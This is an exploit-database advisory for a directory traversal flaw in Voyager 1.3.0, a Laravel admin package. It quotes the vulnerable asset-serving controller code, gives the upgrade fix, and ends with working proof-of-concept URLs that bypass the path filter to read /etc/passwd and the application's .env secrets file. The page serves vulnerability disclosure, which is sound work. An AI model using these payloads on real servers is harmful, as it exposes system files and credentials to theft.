Voyager 1.3.0 - Directory Traversal

vendor:

Voyager

by:

NgoAnhDuc

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: Voyager

Affected Version From: 1.3.0

Affected Version To: 1.3.0

Patch Exists: YES

Related CWE: N/A

CPE: a:the_control_group:voyager

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu 18.04

2020

Voyager 1.3.0 – Directory Traversal

Voyager 1.3.0 and bellow is vulnerable to Directory Traversal. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'path' parameter of the '/admin/voyager-assets' URL. A remote attacker can send a specially crafted request to the vulnerable application and gain access to arbitrary files on the server, including the Laravel environment file. This can lead to further attacks such as remote code execution.

Mitigation:

Upgrade to version 1.3.1 or later.

Source

Exploit-DB raw data:

# Exploit Title: Voyager 1.3.0 - Directory Traversal
# Google Dork: N/A
# Date: January 2020-01-06
# Exploit Author: NgoAnhDuc
# Vendor Homepage: https://voyager.devdojo.com/
# Software Link:https://github.com/the-control-group/voyager/releases/tag/v1.3.0https://github.com/the-control-group/voyager/releases/tag/v1.2.7
# Version: 1.3.0 and bellow
# Tested on: Ubuntu 18.04
# CVE : N/A


Vulnerable code is in voyager/src/Http/Controllers/VoyagerController.php

========================================

public function assets(Request $request)
    {
        *$path = str_start(str_replace(['../', './'], '',
urldecode($request->path)), '/');*
*        $path = base_path('vendor/tcg/voyager/publishable/assets'.$path);*
        if (File::exists($path)) {
            $mime = '';
            if (ends_with($path, '.js')) {
                $mime = 'text/javascript';
            } elseif (ends_with($path, '.css')) {
                $mime = 'text/css';
            } else {
                $mime = File::mimeType($path);
            }
            $response = response(File::get($path), 200,
['Content-Type' => $mime]);
            $response->setSharedMaxAge(31536000);
            $response->setMaxAge(31536000);
            $response->setExpires(new \DateTime('+1 year'));
            return $response;
        }
        return response('', 404);
    }
========================================

PoC:

passwd:

http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd


Laravel environment
file:http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F<web
root dir>/.env